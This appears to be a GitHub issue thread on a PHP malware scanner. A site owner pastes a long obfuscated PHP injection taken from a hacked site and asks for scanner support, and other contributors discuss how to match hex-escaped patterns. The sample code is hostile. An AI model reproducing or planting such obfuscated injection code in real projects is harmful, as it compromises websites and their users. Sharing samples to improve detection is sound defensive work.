New Injection code

[rufnek2k4]

First of all, thanks for the effort.

I just fixed a site injected with this new code that has no base64_decode function. Fixed it by searching "\x" and "?><?php" on every file.

Can you include this in your scanner? Thanks!

actual code:

b%x5c%x7825Zb%x5c%x7825!_##>>X)!gjZb%!%x5c%x7825tww!>!%x5c%x782400~:5h%x5cw#)ldbqov>_ofmy%x5c%x7825)utjm!|!_5!%x5c%x7827!hmg%x5c%x7825)!)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!!x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%2p%x5c%x7825!|!_!_**b%x5c%x445]212]445]43]321]464]284]367827,_e%x5c%x7827,_d%x5c%x7827,_c%x5c%x7827,_b%x5c%x7827)f8]y6g]273]y76]271]y7d]252]y74]256#j%x5c%x7827878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x782525r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x5c%x7827jsv%x5c%x78256^#zsfvr#%x5c%x785cq%%x5c%x782f7&6|7**1%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x!#]x5c%x7825%x5c%x787f!~!!2p%x5c%x7825Zhmg%x5c%x7825!j%x5c%x7825!72]48y]#>m%x5c%x7825:|:_r%x5c%x7825:-t%x5c%x7825)3of:opjudovgnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e5c%x7825bG9}:}.}-}!#_%x5c%x782y76]277]y72]265]y39]274]y85]273]y6g]273]y7f+_0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]24x7825)tpqsut>j%x5c%x7825!_72!%x5c%x7827!hmg%x5c%x7825)!gj!>!}W;ub%x5c%x7825!>!2p%x5c%x7825!_3>?_2b%x5c%x7825)gpf{jt)!gj!<_h>EzH,2W%x5c%x7825wN;#-Ez-1H_WCw_[!%x5c%x7825rN}#QwTW%x5]254]y76#!#]y84]275]y83]273]y76]277#%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6q%x5c%x78256!#]y81]273]y76]25if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") &&_QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860XA6|7__197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6>y83]273]y72]282#!#]y84]275]y8y]}R;2]},;osvufs}%x5c%x7827;m24-%x5c%x7824%x5c%x785c%x5c5fdy!%x5c%x7825tdz&)7gj6<.>1#px782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpp3]248]y83]256]y81]265]y72825w6Z6<.5>Ew:Qb:Qc.fmjgA%x5c%x7827doj%x5c%x78256.%x5c%x7825!!%x5c%x78242178}527}88:}334}47<_>j%x5c%x7825!32%x5c%x782,6<_>:iuhofm%x5c%x7825:-5ppde:M4P8]37]278]225]241]334]368]322]3]364]%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%256!bssbz)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%5c%x78273qj%x5c%x78256<_y>j%x5c%x7825!_9!%x5x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7pd#)tutjyf%x5c%x7860opnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33%x7825)euhA)3of>2bd%x5c%x7825!2q%x5c%x7825q%x5c%x7825V<_>!}%x5c%x7827;d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%hnpd!opjudovg!|!__#j{hnx5c%x7825>U:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd1x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x782%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782ssutRe%x5c%x7825)Rd%x5c%x7825)Rb%xK9]78]K5]53]Kc#!#]D6M7]K3##x7825r%x5c%x7878s%x5c%x7825#]y3g]61]y3f]63]y3:]68]y76#u%x5c%x7825V2q%x5c%x7825#]y31]278]y3e]81]K78:56985:6197g:74985-rrojepdoF.uofuopD#)sfebfI{_w%x5c%x7825)kV%x5c%%x5c%x7822!pd%x5c%x7825)!gj}Z;h!c%x7825c!>!%x5c%x7825i%x5c%x785c2^111%x5c%x782272qj%x5c%x7825)7gj6}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{__u%x5c%x782y6gP7L6M7]D4]275]D:M8]Df##L5297e:56-%x5c%x7878r.98#%x5c%x782f#p#%x5c%x782f%x5c%x7825z>2_!%x5c%x782e%x5c%x78b%x5c%x7825g6<_rfs>%x5c%x7825s:%x5c%x77878::h%x5c%x7825:n%x5c%x7825pt)%x5c%x7825z-#:#_%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x7860QUUI&b%x5c%x7825!|!_7824!>!fyqmpef)#%x5c%x7824_!#]y3d]51]y35]256]y767825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824_!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!t5c%x7825))!gj!<_>!ssb824-%x5c%x7824_12b%x5c%x7825!<_qp>>1_!%x5c%x7825b:>825}X;!sp!_#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%xH#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#25)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7827822)gj!|!_nbsbq%x5c%x7825)323ldfidk!~!%x5c%x782f7rfs%x5c%x78256>>!}_;gvc%x5c%x7825}&;61%154%x28%151%x6d%16P4]D6#%x5c%x7825s:%x5c%x785c%gj!|!_1?hmg%x5c%x7825)!gj!#]D4]273]D6P2L5P6]x7860gvodujpo)##-!#~>_4-1-bubEovg+)!gj+{e%x5c%x7825!osvufs!_!+A!>!{e%x5c%x7825)!>>%x5c%tmbg!osvufs!|ftmf!~<__9.-j>!#]y81]273]y76]258]y6g]273]y76]271]y7d]2c%x7827!hmg%x5c%x7825)!gj!~

[darookee]

I modified this script to work with multiple custom patterns here 4df5ccb36772c1c8749387155519f5437a7b7e36, but I had no luck (and time for that matter) to get it working with escaped unicode characters (\x64\x65...). Maybe you can add a few patterns to that list...

[mikestowe]

Will look into this - thank you for posting...